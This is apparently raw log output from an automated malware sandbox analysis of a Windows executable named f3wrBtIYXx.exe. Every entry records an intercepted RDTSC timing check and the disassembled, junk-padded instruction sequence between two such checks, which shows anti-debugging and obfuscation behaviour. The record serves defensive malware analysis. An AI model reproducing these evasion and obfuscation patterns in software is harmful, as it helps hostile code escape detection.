Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50102E5 second address: 5010302 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010302 second address: 5010327 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5F64D1DABDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010327 second address: 5010379 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edi 0x0000000c movzx ecx, bx 0x0000000f pop edi 0x00000010 push ecx 0x00000011 pushfd 0x00000012 jmp 00007F5F64D1DF1Bh 0x00000017 sub al, FFFFFFBEh 0x0000001a jmp 00007F5F64D1DF29h 0x0000001f popfd 0x00000020 pop eax 0x00000021 popad 0x00000022 xchg eax, ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 push esi 0x00000027 pop edx 0x00000028 mov bx, si 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50202E3 second address: 50202E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50202E8 second address: 5020366 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx ecx, di 0x0000000e jmp 00007F5F64D1DF21h 0x00000013 popad 0x00000014 push eax 0x00000015 jmp 00007F5F64D1DF21h 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c jmp 00007F5F64D1DF1Ch 0x00000021 jmp 00007F5F64D1DF22h 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 jmp 00007F5F64D1DF20h 0x0000002e pop ebp 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F5F64D1DF1Ah 0x00000038 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5020366 second address: 502036C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 502036C second address: 5020371 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5060030 second address: 50600D3 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F5F64D1DAC3h 0x00000008 jmp 00007F5F64D1DAC3h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 mov ecx, 1B004D2Bh 0x00000018 jmp 00007F5F64D1DAC0h 0x0000001d popad 0x0000001e push eax 0x0000001f pushad 0x00000020 mov cx, bx 0x00000023 call 00007F5F64D1DABDh 0x00000028 mov si, 1EE7h 0x0000002c pop ecx 0x0000002d popad 0x0000002e xchg eax, ebp 0x0000002f jmp 00007F5F64D1DAC3h 0x00000034 mov ebp, esp 0x00000036 jmp 00007F5F64D1DAC6h 0x0000003b pop ebp 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F5F64D1DAC7h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50600D3 second address: 50600EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5F64D1DF24h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50303AC second address: 50303B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50303B0 second address: 50303B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50303B6 second address: 50303D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5F64D1DAC7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50303D1 second address: 503040F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F5F64D1DF28h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 503040F second address: 503041E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DABBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 503041E second address: 503046C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 3E787AAAh 0x00000008 mov esi, ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f jmp 00007F5F64D1DF1Dh 0x00000014 mov eax, dword ptr [ebp+08h] 0x00000017 jmp 00007F5F64D1DF1Eh 0x0000001c and dword ptr [eax], 00000000h 0x0000001f jmp 00007F5F64D1DF20h 0x00000024 and dword ptr [eax+04h], 00000000h 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b pushad 0x0000002c popad 0x0000002d mov dx, 4D5Eh 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 501051E second address: 5010541 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5F64D1DABAh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010541 second address: 5010545 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010545 second address: 501054B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 501054B second address: 5010579 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F5F64D1DF1Ah 0x0000000b sbb si, 7668h 0x00000010 jmp 00007F5F64D1DF1Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov bx, cx 0x00000020 mov edx, esi 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010579 second address: 5010593 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5F64D1DAC6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010593 second address: 50105F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F5F64D1DF27h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F5F64D1DF1Bh 0x00000019 adc ch, 0000006Eh 0x0000001c jmp 00007F5F64D1DF29h 0x00000021 popfd 0x00000022 call 00007F5F64D1DF20h 0x00000027 pop eax 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50105F3 second address: 5010646 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5F64D1DABEh 0x00000009 sbb cx, 1318h 0x0000000e jmp 00007F5F64D1DABBh 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F5F64D1DAC8h 0x0000001a sub ch, 00000078h 0x0000001d jmp 00007F5F64D1DABBh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 pop ebp 0x00000027 pushad 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5020EF0 second address: 5020EF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5020EF4 second address: 5020EF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5020EF8 second address: 5020EFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5020EFE second address: 5020F1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5F64D1DAC9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5020F1B second address: 5020F3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5F64D1DF29h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5020F3F second address: 5020F45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5020F45 second address: 5020F49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5020F49 second address: 5020F8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007F5F64D1DABFh 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushfd 0x00000016 jmp 00007F5F64D1DAC2h 0x0000001b and cx, 5D58h 0x00000020 jmp 00007F5F64D1DABBh 0x00000025 popfd 0x00000026 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50301DD second address: 5030201 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d movzx ecx, dx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5050758 second address: 5050773 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5050773 second address: 5050779 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 505088E second address: 50508E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ebx, 75C4B90Ah 0x00000009 popad 0x0000000a popad 0x0000000b mov ecx, eax 0x0000000d jmp 00007F5F64D1DAC1h 0x00000012 xor eax, dword ptr [ebp+08h] 0x00000015 jmp 00007F5F64D1DAC7h 0x0000001a and ecx, 1Fh 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F5F64D1DAC5h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5000037 second address: 500003D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 500003D second address: 500006F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b pushad 0x0000000c mov ax, di 0x0000000f jmp 00007F5F64D1DAC1h 0x00000014 popad 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F5F64D1DABDh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 500006F second address: 50000CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and esp, FFFFFFF8h 0x0000000e jmp 00007F5F64D1DF1Fh 0x00000013 xchg eax, ecx 0x00000014 pushad 0x00000015 pushad 0x00000016 jmp 00007F5F64D1DF22h 0x0000001b call 00007F5F64D1DF22h 0x00000020 pop esi 0x00000021 popad 0x00000022 mov esi, ebx 0x00000024 popad 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F5F64D1DF23h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50000CE second address: 5000175 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b push esi 0x0000000c mov edx, 6FC5F4DEh 0x00000011 pop edi 0x00000012 pushfd 0x00000013 jmp 00007F5F64D1DAC4h 0x00000018 jmp 00007F5F64D1DAC5h 0x0000001d popfd 0x0000001e popad 0x0000001f xchg eax, ebx 0x00000020 pushad 0x00000021 jmp 00007F5F64D1DABCh 0x00000026 mov si, F7A1h 0x0000002a popad 0x0000002b push eax 0x0000002c jmp 00007F5F64D1DAC7h 0x00000031 xchg eax, ebx 0x00000032 pushad 0x00000033 pushad 0x00000034 mov ecx, 0D11DA81h 0x00000039 popad 0x0000003a movsx edi, si 0x0000003d popad 0x0000003e mov ebx, dword ptr [ebp+10h] 0x00000041 jmp 00007F5F64D1DAC4h 0x00000046 xchg eax, esi 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a mov ebx, esi 0x0000004c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5000175 second address: 5000214 instructions: 0x00000000 rdtsc 0x00000002 mov ch, DEh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F5F64D1DF25h 0x0000000c adc cl, FFFFFFE6h 0x0000000f jmp 00007F5F64D1DF21h 0x00000014 popfd 0x00000015 popad 0x00000016 push eax 0x00000017 pushad 0x00000018 mov si, dx 0x0000001b movsx ebx, si 0x0000001e popad 0x0000001f xchg eax, esi 0x00000020 pushad 0x00000021 mov esi, 2A735907h 0x00000026 mov ax, 7EA3h 0x0000002a popad 0x0000002b mov esi, dword ptr [ebp+08h] 0x0000002e pushad 0x0000002f call 00007F5F64D1DF24h 0x00000034 pushad 0x00000035 popad 0x00000036 pop ecx 0x00000037 mov ebx, 5453E294h 0x0000003c popad 0x0000003d push eax 0x0000003e pushad 0x0000003f mov si, DAF5h 0x00000043 pushfd 0x00000044 jmp 00007F5F64D1DF22h 0x00000049 sub cl, 00000048h 0x0000004c jmp 00007F5F64D1DF1Bh 0x00000051 popfd 0x00000052 popad 0x00000053 mov dword ptr [esp], edi 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 mov cl, dh 0x0000005b mov esi, 58F84E53h 0x00000060 popad 0x00000061 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5000214 second address: 5000229 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, D3h 0x00000005 mov ecx, 726C52A7h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d test esi, esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5000229 second address: 500022F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 500022F second address: 5000235 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5000235 second address: 5000285 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F5FD6C4C2D8h 0x00000011 pushad 0x00000012 mov al, CEh 0x00000014 popad 0x00000015 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001c jmp 00007F5F64D1DF25h 0x00000021 je 00007F5FD6C4C2C8h 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5000285 second address: 5000289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5000289 second address: 500028F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 500028F second address: 50002E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [esi+44h] 0x0000000c jmp 00007F5F64D1DAC0h 0x00000011 or edx, dword ptr [ebp+0Ch] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F5F64D1DABDh 0x0000001d and si, C396h 0x00000022 jmp 00007F5F64D1DAC1h 0x00000027 popfd 0x00000028 mov eax, 32440807h 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50002E9 second address: 500030F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edx, 61000000h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5F64D1DF1Dh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 500030F second address: 500031F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5F64D1DABCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 500031F second address: 5000323 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5000323 second address: 5000352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F5FD6C4BE13h 0x0000000e jmp 00007F5F64D1DAC7h 0x00000013 test byte ptr [esi+48h], 00000001h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5000352 second address: 5000356 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5000356 second address: 500035C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 500035C second address: 5000366 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 04EFCBAFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5000366 second address: 50003AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jne 00007F5FD6C4BDEAh 0x0000000d pushad 0x0000000e mov dx, ax 0x00000011 movzx esi, di 0x00000014 popad 0x00000015 test bl, 00000007h 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushfd 0x0000001c jmp 00007F5F64D1DAC1h 0x00000021 sbb ax, C3C6h 0x00000026 jmp 00007F5F64D1DAC1h 0x0000002b popfd 0x0000002c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 4FF0815 second address: 4FF082C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop eax 0x00000006 popad 0x00000007 movsx edi, si 0x0000000a popad 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov cx, dx 0x00000012 mov di, 8F7Ch 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 4FF0929 second address: 4FF09B0 instructions: 0x00000000 rdtsc 0x00000002 mov edi, 207181C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, esi 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F5F64D1DAC3h 0x00000012 jmp 00007F5F64D1DAC3h 0x00000017 popfd 0x00000018 jmp 00007F5F64D1DAC8h 0x0000001d popad 0x0000001e mov esi, dword ptr [ebp+08h] 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov esi, ebx 0x00000026 pushfd 0x00000027 jmp 00007F5F64D1DAC9h 0x0000002c sbb cx, 9DE6h 0x00000031 jmp 00007F5F64D1DAC1h 0x00000036 popfd 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 4FF09B0 second address: 4FF09FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F5F64D1DF1Dh 0x00000012 adc eax, 0250CDF6h 0x00000018 jmp 00007F5F64D1DF21h 0x0000001d popfd 0x0000001e mov edi, eax 0x00000020 popad 0x00000021 test esi, esi 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 movsx ebx, cx 0x00000029 push ecx 0x0000002a pop ebx 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 4FF09FC second address: 4FF0A4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, 23h 0x00000005 pushfd 0x00000006 jmp 00007F5F64D1DAC4h 0x0000000b add cl, 00000078h 0x0000000e jmp 00007F5F64D1DABBh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 je 00007F5FD6C5341Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov esi, edi 0x00000022 call 00007F5F64D1DAC7h 0x00000027 pop eax 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 4FF0A4C second address: 4FF0A86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF26h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F5F64D1DF27h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 4FF0A86 second address: 4FF0ADA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, F20Ah 0x00000007 movsx edx, cx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ecx, esi 0x0000000f pushad 0x00000010 call 00007F5F64D1DAC8h 0x00000015 movzx eax, bx 0x00000018 pop edx 0x00000019 movzx ecx, di 0x0000001c popad 0x0000001d je 00007F5FD6C533A3h 0x00000023 jmp 00007F5F64D1DABFh 0x00000028 test byte ptr [76FB6968h], 00000002h 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 pushad 0x00000033 popad 0x00000034 mov ah, bh 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 4FF0ADA second address: 4FF0AE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 4FF0AE0 second address: 4FF0B80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F5FD6C53384h 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F5F64D1DAC7h 0x00000015 jmp 00007F5F64D1DAC3h 0x0000001a popfd 0x0000001b mov ebx, esi 0x0000001d popad 0x0000001e mov edx, dword ptr [ebp+0Ch] 0x00000021 pushad 0x00000022 jmp 00007F5F64D1DAC0h 0x00000027 popad 0x00000028 push ebx 0x00000029 jmp 00007F5F64D1DABCh 0x0000002e mov dword ptr [esp], ebx 0x00000031 pushad 0x00000032 mov cl, B7h 0x00000034 mov esi, edx 0x00000036 popad 0x00000037 push ebp 0x00000038 pushad 0x00000039 mov eax, 5FC2C5A7h 0x0000003e movzx esi, di 0x00000041 popad 0x00000042 mov dword ptr [esp], ebx 0x00000045 jmp 00007F5F64D1DABFh 0x0000004a push dword ptr [ebp+14h] 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007F5F64D1DAC5h 0x00000054 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 4FF0C2B second address: 4FF0C59 instructions: 0x00000000 rdtsc 0x00000002 movzx esi, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F5F64D1DF20h 0x00000012 adc ah, 00000078h 0x00000015 jmp 00007F5F64D1DF1Bh 0x0000001a popfd 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
